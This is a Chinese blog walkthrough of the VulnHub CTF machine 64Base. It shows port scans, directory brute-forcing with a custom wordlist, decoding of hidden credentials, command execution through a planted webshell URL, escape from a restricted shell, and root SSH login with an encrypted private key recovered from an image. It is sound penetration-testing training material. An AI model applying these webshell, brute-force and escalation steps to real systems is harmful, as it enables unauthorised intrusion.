OSCP - 64Base_3mrgnc3 的破解

最新推荐文章于 2023-03-14 10:26:28 发布
最新推荐文章于 2023-03-14 10:26:28 发布
阅读量1.3w 收藏 3
点赞数 1
分类专栏: OSCP-CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kevinhanser/article/details/88096953
版权

本文主要记录对 64Base_3mrgnc3 的渗透学习过程,测试的 VM 主机主要来源 www.vulnhub.com
博客集:面向 CTF 的 OSCP 破解系列
下载链接:64Base_3mrgnc3

  1. 首先设置靶机和kali在同一个网段中。然后用 netdiscover 发现IP

     root@kali:~# netdiscover -r 10.10.10.0/24
  Currently scanning: Finished!   |   Screen View: Unique Hosts
 
  4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240
  _____________________________________________________________________________
    IP            At MAC Address     Count     Len  MAC Vendor / Hostname
  -----------------------------------------------------------------------------
  10.10.10.1      00:50:56:c0:00:08      1      60  VMware, Inc.
  10.10.10.2      00:50:56:fb:16:b2      1      60  VMware, Inc.
  10.10.10.154    00:0c:29:60:fd:07      1      60  VMware, Inc.
  10.10.10.254    00:50:56:fe:24:e8      1      60  VMware, Inc.

  2. 可以确定靶机的IP是10.10.10.154吗,下面使用 nmap 扫描开放的端口

     root@kali:~# nmap  10.10.10.154 -p 1-65535 -sT -T4
 Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-03 10:37 EST
 Nmap scan report for 10.10.10.154
 Host is up (0.0010s latency).
 Not shown: 65531 closed ports
 PORT      STATE SERVICE
 22/tcp    open  ssh
 80/tcp    open  http
 4899/tcp  open  radmin
 62964/tcp open  unknown
 MAC Address: 00:0C:29:60:FD:07 (VMware)

    由上可知,发现端口22、80、4899、62964,一种快速判断端口的 banner 信息的方式是 nc 或者 telnet

     root@kali:~# telnet 10.10.10.154 22
 Trying 10.10.10.154...
 Connected to 10.10.10.154.
 Escape character is '^]'.
 The programs included with the Fedora GNU/Linux system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.
 
 Fedora GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
 permitted by applicable law.
 Last login: Mon Oct 24 02:04:10 4025 from 010.101.010.001
 
 #

    提示信息最后一次登录是215年,登录IP为 01.101.10.001,很显然,这是虚假信息。下面看一下 80 端口
    root@kali:~# nc -nv 10.10.10.154 80
    (UNKNOWN) [10.10.10.154] 80 (http) open

     HEAD / HTTP/1.0
 
 HTTP/1.1 200 OK
 Date: Mon, 25 Feb 2019 05:22:02 GMT
 Server: Apache/2.4.10 (Debian)
 Last-Modified: Tue, 06 Dec 2016 05:33:14 GMT
 ETag: "1fdf-542f6bd9b68a0"
 Accept-Ranges: bytes
 Content-Length: 8159
 Vary: Accept-Encoding
 Connection: close
 Content-Type: text/html

    显示是正常的 apache web 服务器。下面看一下 4899 端口

     root@kali:~# nc -nv 10.10.10.154 4899
 (UNKNOWN) [10.10.10.154] 4899 (radmin-port) open
 sshhh! ssh! droids!
 
 
 
 
 
 So..
 
 You found a way in then...
 
 but, can you pop root?
 
 
 
                                            /~\
                                           |oo )    Did you hear that?
                                           _\=/_
                           ___            /  _  \
                          / ()\          //|/.\|\\
                        _|_____|_        \\ \_/  ||
                       | | === | |        \|\ /| ||
                       |_|  O  |_|        # _ _/ #
                        ||  O  ||          | | |
                        ||__*__||          | | |
                       |~ \___/ ~|         []|[]
                       /=\ /=\ /=\         | | |
       ________________[_]_[_]_[_]________/_]_[_\_________________________

    由于回显信息中有55个空行,所以显示区域会被顶上去。然而上面的显示区域中还显示了 sshhh! ssh! droids! ,这个应该不是 ssh 端口。下面看一下 62964 端口

     root@kali:~# nc -nv 10.10.10.154 62964
 (UNKNOWN) [10.10.10.154] 62964 (?) open
 SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3

    这个应该是真实的 SSH 端口

  3. 深度分析 80 端口的 web 网站

    使用浏览器打开10.10.10.154 即可访问网站主页
    在这里插入图片描述

    很显然可以看到有一串随机字符

     root@kali:~# echo dmlldyBzb3VyY2UgO0QK | base64 --decode
 view source ;D

    根据提示信息,让我们查看源代码

    在这里插入图片描述

    可以看到源代码中随机字符串 5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a
    根据字符串的格式判断,不是 base64 编码的,更像是 十六进制编码的,尝试解码,发现可以解码之后发现结果是 base64 编码的,再尝试解码

     root@kali:~# echo 5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a | xxd -p -r | base64 --decode
 flag1{NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==}

    这时候就得到了 flag1:flag1{NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==}

    对flag1的结果解码:

     root@kali:~# echo NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==| base64 --decode
 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4

    在主页中浏览其他选项卡,在 post 页面中看到有很多线索,包括最下方的图片

    在这里插入图片描述

    图像说:

    IMPORTANT!!! USE SYSTEM INSTEAD OF EXEC TO RUN THE SECRET 5H377。

    以及它下面的评论说:

    Only respond if you are a real Imperial-Class BountyHunter

  4. 在主页中已经无法找到有价值的信息,下面开始进行枚举暴破

    使用 nikto 对网站进行枚举

     root@kali:~# nikto -host "http://10.10.10.154" -Display -output
 - Nikto v2.1.6
 ---------------------------------------------------------------------------
 + Target IP:          10.10.10.154
 + Target Hostname:    10.10.10.154
 + Target Port:        80
 + Start Time:         2019-03-03 09:13:59 (GMT-5)
 ---------------------------------------------------------------------------
 + Server: Apache/2.4.10 (Debian)
 
 + "robots.txt" contains 429 entries which should be manually viewed.
 + Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
 + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
 - STATUS: Completed 1500 requests (~22% complete, 14 seconds left): currently in plugin 'Nikto Tests'
 - STATUS: Running average: Not enough data.
 - STATUS: Completed 2000 requests (~29% complete, 15 seconds left): currently in plugin 'Nikto Tests'
 - STATUS: Running average: Not enough data.
 - STATUS: Completed 2500 requests (~36% complete, 12 seconds left): currently in plugin 'Nikto Tests'
 - STATUS: Running average: Not enough data.
 + OSVDB-3268: /img/: Directory indexing found.
 + OSVDB-3092: /img/: This might be interesting...
 + OSVDB-3268: /mail/: Directory indexing found.
 + OSVDB-3092: /mail/: This might be interesting...
 + OSVDB-3092: /members/: This might be interesting...
 + OSVDB-3092: /order/: This might be interesting...
 + OSVDB-3092: /staff/: This might be interesting...
 + OSVDB-3092: /manual/: Web server manual found.
 - STATUS: Completed 3000 requests (~43% complete, 12 seconds left): currently in plugin 'Nikto Tests'
 - STATUS: Running average: Not enough data.
 - STATUS: Completed 3500 requests (~50% complete, 10 seconds left): currently in plugin 'Nikto Tests'
 - STATUS: Running average: Not enough data.
 + OSVDB-3268: /manual/images/: Directory indexing found.
 - STATUS: Completed 4000 requests (~58% complete, 8 seconds left): currently in plugin 'Nikto Tests'
 - STATUS: Running average: Not enough data.
 + OSVDB-3233: /icons/README: Apache default file found.
 + OSVDB-3092: /as/: This might be interesting... potential country code (American Samoa)
 + OSVDB-3092: /by/: This might be interesting... potential country code (Belarus)
 + OSVDB-3092: /is/: This might be interesting... potential country code (Iceland)
 + OSVDB-3092: /no/: This might be interesting... potential country code (Norway)
 + OSVDB-3092: /to/: This might be interesting... potential country code (Tonga)
 - STATUS: Completed 4500 requests (~65% complete, 7 seconds left): currently in plugin 'Nikto Tests'
 - STATUS: Running average: Not enough data.
 - STATUS: Completed 5000 requests (~72% complete, 5 seconds left): currently in plugin 'Nikto Tests'
 - STATUS: Running average: Not enough data.
 - STATUS: Completed 5500 requests (~79% complete, 4 seconds left): currently in plugin 'Nikto Tests'
 - STATUS: Running average: Not enough data.
 - STATUS: Completed 6000 requests (~87% complete, 3 seconds left): currently in plugin 'Nikto Tests'
 - STATUS: Running average: Not enough data.
 - STATUS: Completed 6500 requests (~94% complete, 1 seconds left): currently in plugin 'Nikto Tests'
 - STATUS: Running average: Not enough data.
 - STATUS: Completed 7000 requests: currently in plugin 'Nikto Tests'
 - STATUS: Running average: Not enough data.
 + 8079 requests: 0 error(s) and 434 item(s) reported on remote host
 + End Time:           2019-03-03 09:14:21 (GMT-5) (22 seconds)
 ---------------------------------------------------------------------------
 + 1 host(s) tested
 root@kali:~#

    显示有很多 robos.txt 文件报错

    “robots.txt” contains 429 entries which should be manually viewed

    正常情况下,robos.txt 文件是不会产生报错信息的,所以尝试另一种思路,进行网站的目录暴破,通常我们只会对后台管理页面感兴趣,但是那个会要求输入密码,所以只需要过滤 401响应代码的页面

     root@kali:~# dirb http://10.10.10.154 | grep "CODE:401"
 + http://10.10.10.154/admin (CODE:401|SIZE:459)

    浏览器访问提示需要用户名和密码

    在这里插入图片描述

    我们尝试使用flag1得出的类似于用户名和密码的结果(64base:Th353@r3N0TdaDr01DzU@reL00K1ing4)进行验证测试

     root@kali:~# curl -u "64base:Th353@r3N0TdaDr01DzU@reL00K1ing4" -s http://10.10.10.154/admin
 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
 <html><head>
 <title>401 Unauthorized</title>
 </head><body>
 <h1>Unauthorized</h1>
 <p>This server could not verify that you
 are authorized to access the document
 requested.  Either you supplied the wrong
 credentials (e.g., bad password), or your
 browser doesn't understand how to supply
 the credentials required.</p>
 <hr>
 <address>Apache/2.4.10 (Debian) Server at 10.10.10.154 Port 80</address>
 </body></html>

    提示无法登陆成功,下面开始尝试暴力破解。但是想要破解需要字典,此时可以尝试信息收集自己制作密码字典。

  5. 制作暴破的密码字典并开始暴破

    在这种情况下,我们可以通过递归复制博客中的所有内容(包括robots.txt,HTML和JavaScript)来制作字典。使用wget正确的标志允许我们将所有内容转储到单个文件中。然后我们可以使用的工具html2dic,并 sort 把它清理干净,并将其转换成可用单词表。

    root@kali:~# wget http://10.10.10.154 -rq -O base64.out
    root@kali:~# ls -al base64.out
    -rw-r–r-- 1 root root 1869208 Dec 5 2016 base64.out
    root@kali:~# html2dic base64.out | sort -u > base64.dict
    root@kali:~# wc -l base64.dict
    12845 base64.dict

    使用密码字典进行暴破目录

    root@kali:~# dirb http://10.10.10.154 base64.dict | grep “CODE:401”

    发现还有一个目录,访问这个目录(http://10.10.10.154/Imperial-Class/),然后使用密码(64base:Th353@r3N0TdaDr01DzU@reL00K1ing4)登录,登录成功

    查看页面源代码或者使用命令行登录:

     root@kali:~# curl -u '64base:Th353@r3N0TdaDr01DzU@reL00K1ing4' -s http://10.10.10.154/Imperial-Class/
 <!DOCTYPE html>
 <html lang="en">
 <body bgcolor=#000000><font color=#cfbf00>
 <title>64base - login</title>
 <h3>[☠] ERROR: incorrect path!.... TO THE DARK SIDE!</h3>
 <!-- don't forget the BountyHunter login -->

    提示信息,不要忘记 BountyHunter 登录。那么问题来了,在哪里可以使用 BountyHunter 登录呢?

    突然想到前面提到图片下面有提示信息:

    Only respond if you are a real Imperial-Class BountyHunter

    此时,构建 URL:

    http:// 10.10.10.154/Imperial-Class/BountyHunter/

    发现需要登录才可以查看

    在这里插入图片描述

    此时,我们可以使用尝试使用密码登录,登录之后发现原来的URl“http://10.10.10.154/Imperial-Class/BountyHunter/”换成了
    http://10.10.10.154/Imperial-Class/BountyHunter/index.php”,虽然页面一样,但是源代码是不一样的,多了这行“<!-- basictoken=52714d544a54626d51315a45566157464655614446525557383966516f3d0a -->”,同时前面有两个 id 都是随机字符,尝试拼接

    下面对这个随机字符串进行解码

     root@kali:~# echo "5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c3252714d544a54626d51315a45566157464655614446525557383966516f3d0a" | xxd -p -r | base64 --decode
 flag2{aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=}

    得到 flag2,下面解密 flag2的内容

     root@kali:~# echo "aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=" | base64 --decode
 https://www.youtube.com/watch?v=vJwytFWA8uA

    根据结果,访问此视频链接,发现视频的名字提示使用 Burp

    在这里插入图片描述

    不使用burp,而使用 curl 也是可以抓到这个 flag 的,这是因为 也可免重定向的时候浏览器无法加载,但是burp可以发现。

     root@kali:~# curl -u '64base:Th353@r3N0TdaDr01DzU@reL00K1ing4' -s http://10.10.10.154/Imperial-Class/BountyHunter/login.php | grep flag|cut -d{ -f2|cut -d} -f1|base64 -d
 53cr3t5h377/Imperial-Class/BountyHunter/login.php?f=exec&c=id

    访问返回结果中的 URL,发现疑似 webshell

  6. 登录 webshell

    使用浏览器访问页面:http:// 10.10.10.154//Imperial-Class/BountyHunter/login.php?f=exec&c=id 无响应

    突然想到前天有提示:
    IMPORTANT!!! USE SYSTEM INSTEAD OF EXEC TO RUN THE SECRET 5H377

    构造 URL:
    http:// 10.10.10.154//Imperial-Class/BountyHunter/login.php?f=system&c=id
    获得返回结果:
    在这里插入图片描述

    结果中存在flag4:flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==},并且知道当前用户名为 id

    将flag4 进行解码:

     root@kali:~# echo "NjRiYXNlOjY0YmFzZTVoMzc3Cg==" | base64 --decode
 64base:64base5h377

    得到结果为 64base5h377,下面将其进行编码之后作为密码登录 SSH

     root@kali:~# echo "64base5h377" | base64
 NjRiYXNlNWgzNzcK

    使用账号密码 64base:NjRiYXNlNWgzNzcK 即可登录 10.10.10.154 的 SSH 后台

     root@kali:~# ssh 64base@10.10.10.154 -p 62964
 64base@10.10.10.154's password:
 Last login: Tue Dec  6 05:10:28 2016 from 172.16.0.18
 64base@64base:~$

    发现有些命令无法识别,但是有些命令只能打印出字符图案

     64base@64base:~$ id
 -rbash: id: command not found
 64base@64base:~$ ls
 well_done_:D
 64base@64base:~$ pwd
 /64base
 64base@64base:~$

    下面进行测试发现 find,python,ruby 等很多命令都不能运行,但是 base64 可以运行

     64base@64base:~$ base64 well_done_:D | base64 --decode
 sshhh! ssh! droids!








 
 
 
 
 So..
 
 You found a way in then...
 
 but, can you pop root?
 
 
 
                                            /~\
                                           |oo )    Did you hear that?
                                           _\=/_
                           ___            /  _  \
                          / ()\          //|/.\|\\
                        _|_____|_        \\ \_/  ||
                       | | === | |        \|\ /| ||
                       |_|  O  |_|        # _ _/ #
                        ||  O  ||          | | |
                        ||__*__||          | | |
                       |~ \___/ ~|         []|[]
                       /=\ /=\ /=\         | | |
       ________________[_]_[_]_[_]________/_]_[_\_________________________
 
 
 64base@64base:~$

    另外有 env 命令可以运行

     64base@64base:~$ env
 TERM=xterm
 SHELL=/bin/rbash
 SSH_CLIENT=10.10.10.157 49858 62964
 SSH_TTY=/dev/pts/0
 USER=64base
 
 
 64base@64base:~$ echo $PATH/*
 /var/alt-bin/awk /var/alt-bin/base64 /var/alt-bin/cat /var/alt-bin/droids /var/alt-bin/egrep /var/alt-bin/env /var/alt-bin/fgrep /var/alt-bin/file /var/alt-bin/find /var/alt-bin/grep /var/alt-bin/head /var/alt-bin/less /var/alt-bin/ls /var/alt-bin/more /var/alt-bin/perl /var/alt-bin/python /var/alt-bin/ruby /var/alt-bin/tail
 64base@64base:~$

    对命令进行分析发现一个 /var/alt-bin/droids,这个命令很奇怪,运行

     64base@64base:~$ droids

    在这里插入图片描述

  7. 发现已经打破了 shell 命令无法输入的限制

     64base@64base:~$ echo $PATH
 /var/alt-bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
 
 64base@64base:~$ /bin/ls -la
 total 20
 drwxr-xr-x  2 root root 4096 Dec  6  2016 .
 drwxr-xr-x 22 root root 4096 Dec  6  2016 ..
 -rw-r--r--  1 root root 3602 Dec  6  2016 .bashrc
 -rw-r--r--  1 root root  183 Dec  6  2016 .profile
 ---S---r-x  1 root root  819 Dec  6  2016 well_done_:D
 
 64base@64base:~$ /bin/ls /
 64base  boot  etc   initrd.img  lost+found  mnt  proc  run   srv  tmp  var
 bin     dev   home  lib         media       opt  root  sbin  sys  usr  vmlinuz

    使用 find 命令查询 flag5

     64base@64base:/var$ /usr/bin/find /var -name flag5*
 /var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==}
 
 64base@64base:/var$ echo TG9vayBJbnNpZGUhIDpECg==|base64 -d
 Look Inside! :D
 
 64base@64base:/var$ file /var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==}
 /var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==}: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, comment: "4c5330744c5331435255644a546942535530456755464a4a566b4655525342", baseline, precision 8, 960x720, frames 3

    发现下面有 十六进制,看一下是否是全面的

     64base@64base:/var$ strings /var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==} | /usr/bin/head
 JFIF
 4c5330744c5331435255644a546942535530456755464a4a566b46555253424c52566b744c5330744c517051636d396a4c565235634755364944517352553544556c6c5156455645436b52460a5379314a626d5a764f69424252564d744d5449344c554e43517977324d6a46424d7a68425155513052546c475155457a4e6a55335130457a4f44673452446c434d7a553251776f4b625552300a556e684a643267304d464a54546b467a4d697473546c4a49646c4d356557684e4b325668654868564e586c795231424461334a6955566376556d64515543745352307043656a6c57636c52720a646c6c334e67705a59303931575756615457707a4e475a4a55473433526c7035536d64345230686f5533685262336857626a6c7252477433626e4e4e546b5270636e526a62304e50617a6c530a524546484e5756344f58673056453136436a684a624552435558453161546c5a656d6f35646c426d656d56435246706b53586f35524863795a323479553246465a335531656d56734b7a5a490a52303969526a686161444e4e53574e6f6554687a4d5668795254414b61335a4d53306b794e544a74656c64334e47746955334d354b31466856336c6f4d7a52724f45704a566e7031597a46520a51336c69656a56586231553157545532527a5a784d564a6b637a426959315a785446567a5a51704e5533704c617a4e745332465851586c4d574778764e3078756258467856555a4c5347356b0a516b557855326851566c5a704e47497752336c475355785054335a3062585a47596a5172656d68314e6d705056316c49436d73796147524453453554644374705a3264354f57686f4d3270680a52576456626c4e51576e56464e30354b6430525a5954646c553052685a3077784e31684c634774744d6c6c70516c5a7956566834566b31756232494b643168535a6a56435930644c56546b330a65475276636c59795648457261446c4c553278615a5463354f58527956484a475230356c4d4456326545527961576f315658517953324e52654373354f457334533342585441706e645570510a556c424c52326c71627a6b3253455248597a4e4d4e566c7a65453969566d63724c325a714d4546326330746d636d4e574c327834595663725357313562574d7854566870536b316962554e360a62455233436c52425632316863577453526b52355154464956585a30646c4e6c566e46544d533949616d6845647a6c6b4e45747a646e4e71613270326557565256484e7a5a6e4e6b52324e560a4d47684561316833556c647a6332514b4d6d517a5279744f616d3078556a56615445356e556d784f63465a48616d684c517a524263325a59557a4e4b4d486f7964444e4355453035576b39430a54554a6c4f5552344f4870744e58684757546c365633527964677042523342794d454a6f4f45745264323177616c4656597a46685a6e4e78595646594d465649546b7859564446615431644c0a616d63305530457a57454d355a454e4665555a784d464e4a65464671547a6c4d52304e48436a52524e57356a5a6c566f62585a3063586c3164454e7362444a6b5746427a57465a455a54526c0a6230517851327432536b354557544e4c554663725232744f4f5577724f554e516554677252453531626b5a4a6433674b4b3151724b7a64525a7939315546684c6354524e4e6a464a555467770a4d7a52566148565356314d30564846514f57463657444e44527a6c4d65573970516a5a57596b74505a555233546a68686157784d533170436377706d57546c524e6b464e4d584e3562476c360a53444675626e684c5433526155566431636e68715230704353584d324d6e526c6245317259584d356555354e617a4e4d64546478556b6732633364504f584e6b56454a70436974714d4867300a64555261616b706a5a30315965475a694d4863315154593062466c4763303153656b5a714e31686b5a6e6b784f53744e5a54684b525768524f45744f57455233555574456556564d526b39550a63336f4b4d544e575a6b4a4f65466c7a65557731656b6459546e703563566f3053533950547a644e5a575179616a4248656a426e4d6a4670534545764d445a74636e4d795932786b637a5a540a56554a4852585a754f4535705667707955334a494e6e5a46637a5254656d63776544686b5a45643255544278567a463254577455556e557a54336b765a544577526a63304e586845545546550a53314a7353316f32636c6c4954554e34536a4e4a59323530436b56364d45394e57466c6b517a5a4461555976535664305a3252564b32684c65585a7a4e484e4764454e4359327854595764740a5246524b4d6d74615a485530556c4a3357565a574e6d394a546e6f35596e4250646b554b556e677a534656785a6d354c553268796458704e4f56707261556c7264564e6d556e526d615531320a596c52365a6d5a4b56464d30597a513451303831574339535a5559765157464e654774695532524654305a7a53517047646a6c595a476b355532524f6458684853455579527a5249646b706b0a53584279526c5679566c4e7755306b344d48646e636d49794e44567a647a5a6e5647397064466f354d47684b4e47354b4e5746354e304648436c6c7059574531627a63344e7a63765a6e63320a57566f764d6c557a5155526b61564e50516d3072614770574d6b705765484a7665565659596b63315a475a734d32303452335a6d4e7a464b4e6a4a4753484534646d6f4b63557068626c4e720a4f4445334e586f77596d70795746646b5445637a52464e735355707063327851567974355247466d4e316c43566c6c33563149725645457861304d326157564a5154563056544e776269394a0a4d776f324e466f31625842444b3364785a6c52345232646c51334e6e53577335646c4e754d6e41765a5756305a456b7a5a6c46584f46645952564a69524756304d56564d5346427864456c700a4e314e61596d6f3464697451436d5a7553457852646b563353584d72516d59785133424c4d554672576d565654564a4655577443614552704e7a4a49526d4a334d6b6376656e46306153395a0a5a4735786545463562445a4d576e704a5a5646754f48514b4c3064714e477468636b6f78615530355357597a4f57524e4e55396851315a615569395554304a575956493462584a514e315a300a536d39794f57706c53444a305255777764473946635664434d56424c4d48565955416f744c5330744c55564f524342535530456755464a4a566b46555253424c52566b744c5330744c516f3d0a
 $Wbr
 %4568CDgt
 &9ESTVcsu
 '7FGdf
 (Uev
 #3Rbr
 mX$S(
 -E=m
 64base@64base:/var$

    将上面的 十六进制进行解密

     64base@64base:/var$ echo "4c5330744c5336e704a5a5646754f48514b4c3064714e477468636b6f7861
 5530355357597a4f57524e4e55396851315a615569395554304a57595649346
 .....................
 .....................
 .....................
 2584a514e315a300a536d39794f57706c53444a305255777764473946635664
 434d56424c4d48565955416f744c5330744c55564f524342535530456755464
 a4a566b46555253424c52566b744c5330744c516f3d0a" | xxd -p -r | base64 --decode
 -----BEGIN RSA PRIVATE KEY-----
 Proc-Type: 4,ENCRYPTED
 DEK-Info: AES-128-CBC,621A38AAD4E9FAA3657CA3888D9B356C
 
 mDtRxIwh40RSNAs2+lNRHvS9yhM+eaxxU5yrGPCkrbQW/RgPP+RGJBz9VrTkvYw6
 YcOuYeZMjs4fIPn7FZyJgxGHhSxQoxVn9kDkwnsMNDirtcoCOk9RDAG5ex9x4TMz
 8IlDBQq5i9Yzj9vPfzeBDZdIz9Dw2gn2SaEgu5zel+6HGObF8Zh3MIchy8s1XrE0
 kvLKI252mzWw4kbSs9+QaWyh34k8JIVzuc1QCybz5WoU5Y56G6q1Rds0bcVqLUse
 MSzKk3mKaWAyLXlo7LnmqqUFKHndBE1ShPVVi4b0GyFILOOvtmvFb4+zhu6jOWYH
 k2hdCHNSt+iggy9hh3jaEgUnSPZuE7NJwDYa7eSDagL17XKpkm2YiBVrUXxVMnob
 wXRf5BcGKU97xdorV2Tq+h9KSlZe799trTrFGNe05vxDrij5Ut2KcQx+98K8KpWL
 guJPRPKGijo96HDGc3L5YsxObVg+/fj0AvsKfrcV/lxaW+Imymc1MXiJMbmCzlDw
 TAWmaqkRFDyA1HUvtvSeVqS1/HjhDw9d4KsvsjkjvyeQTssfsdGcU0hDkXwRWssd
 2d3G+Njm1R5ZLNgRlNpVGjhKC4AsfXS3J0z2t3BPM9ZOBMBe9Dx8zm5xFY9zWtrv
 AGpr0Bh8KQwmpjQUc1afsqaQX0UHNLXT1ZOWKjg4SA3XC9dCEyFq0SIxQjO9LGCG
 4Q5ncfUhmvtqyutCll2dXPsXVDe4eoD1CkvJNDY3KPW+GkN9L+9CPy8+DNunFIwx
 +T++7Qg/uPXKq4M61IQ8034UhuRWS4TqP9azX3CG9LyoiB6VbKOeDwN8ailLKZBs
 fY9Q6AM1sylizH1nnxKOtZQWurxjGJBIs62telMkas9yNMk3Lu7qRH6swO9sdTBi
 +j0x4uDZjJcgMXxfb0w5A64lYFsMRzFj7Xdfy19+Me8JEhQ8KNXDwQKDyULFOTsz
 13VfBNxYsyL5zGXNzyqZ4I/OO7Med2j0Gz0g21iHA/06mrs2clds6SUBGEvn8NiV
 rSrH6vEs4Szg0x8ddGvQ0qW1vMkTRu3Oy/e10F745xDMATKRlKZ6rYHMCxJ3Icnt
 Ez0OMXYdC6CiF/IWtgdU+hKyvs4sFtCBclSagmDTJ2kZdu4RRwYVV6oINz9bpOvE
 Rx3HUqfnKShruzM9ZkiIkuSfRtfiMvbTzffJTS4c48CO5X/ReF/AaMxkbSdEOFsI
 Fv9Xdi9SdNuxGHE2G4HvJdIprFUrVSpSI80wgrb245sw6gToitZ90hJ4nJ5ay7AG
 Yiaa5o7877/fw6YZ/2U3ADdiSOBm+hjV2JVxroyUXbG5dfl3m8Gvf71J62FHq8vj
 qJanSk8175z0bjrXWdLG3DSlIJislPW+yDaf7YBVYwWR+TA1kC6ieIA5tU3pn/I3
 64Z5mpC+wqfTxGgeCsgIk9vSn2p/eetdI3fQW8WXERbDet1ULHPqtIi7SZbj8v+P
 fnHLQvEwIs+Bf1CpK1AkZeUMREQkBhDi72HFbw2G/zqti/YdnqxAyl6LZzIeQn8t
 /Gj4karJ1iM9If39dM5OaCVZR/TOBVaR8mrP7VtJor9jeH2tEL0toEqWB1PK0uXP
 -----END RSA PRIVATE KEY-----
 64base@64base:/var$

    看起来这是一个 SSH 密钥信息,将其输出到文件

     64base@64base:/var$ echo "4c5330744c5336e704a5a5646754f48514b4c3064714e477468636b6f7861
 5530355357597a4f57524e4e55396851315a615569395554304a57595649346
 .....................
 .....................
 .....................
 2584a514e315a300a536d39794f57706c53444a305255777764473946635664
 434d56424c4d48565955416f744c5330744c55564f524342535530456755464
 a4a566b46555253424c52566b744c5330744c516f3d0a"  | xxd -p -r | base64 --decode > /tmp/ssh.key


 64base@64base:/tmp$ ls
 ssh.key

    使用公钥进行登录

     64base@64base:/tmp$ ssh root@10.10.10.154 -p 62964 -i /tmp/ssh.key
 Could not create directory '/64base/.ssh'.
 The authenticity of host '[10.10.10.154]:62964 ([10.10.10.154]:62964)' can't be established.
 ECDSA key fingerprint is 97:94:13:38:92:70:6c:3a:c0:4f:f3:f3:e7:ce:40:91.
 Are you sure you want to continue connecting (yes/no)? yes
 Failed to add the host to the list of known hosts (/64base/.ssh/known_hosts).
 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
 @         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
 Permissions 0644 for '/tmp/ssh.key' are too open.
 It is recommended that your private key files are NOT accessible by others.
 This private key will be ignored.
 key_load_private_type: bad permissions
 root@10.10.10.154's password:

  8. kali 下载 flag5 文件

    用户名密码:64base/NjRiYXNlNWgzNzcK

     root@kali:~# scp -P 62964 64base@10.10.10.154:/var/www/html/admin/S3cR37/flag5* flag5.jpeg
 64base@10.10.10.154's password:
 flag5{TG9vayBJbnNpZGUhIDpECg==}                                                           100%  192KB  46.5MB/s   00:00
 root@kali:~#

    打开图片看到,图中有字

    [外链图片转存失败(img-6T2qEc0X-1562121052140)(https://i.imgur.com/OJzYwfi.jpg)]

    使用图中的字登录 usetheforce 作为密码

     64base@64base:/$ ssh root@127.0.0.1 -p 62964 -i /tmp/ssh.key 
 Could not create directory '/64base/.ssh'.
 The authenticity of host '[127.0.0.1]:62964 ([127.0.0.1]:62964)' can't be established.
 ECDSA key fingerprint is 97:94:13:38:92:70:6c:3a:c0:4f:f3:f3:e7:ce:40:91.
 Are you sure you want to continue connecting (yes/no)? yes
 Failed to add the host to the list of known hosts (/64base/.ssh/known_hosts).
 Enter passphrase for key '/tmp/rsa-key': 
 
 Last login: Wed Dec  7 16:27:53 2016 from localhost
 
 flag6{NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK}
 root@64base:~#

    得到 flag6 ,将其解码

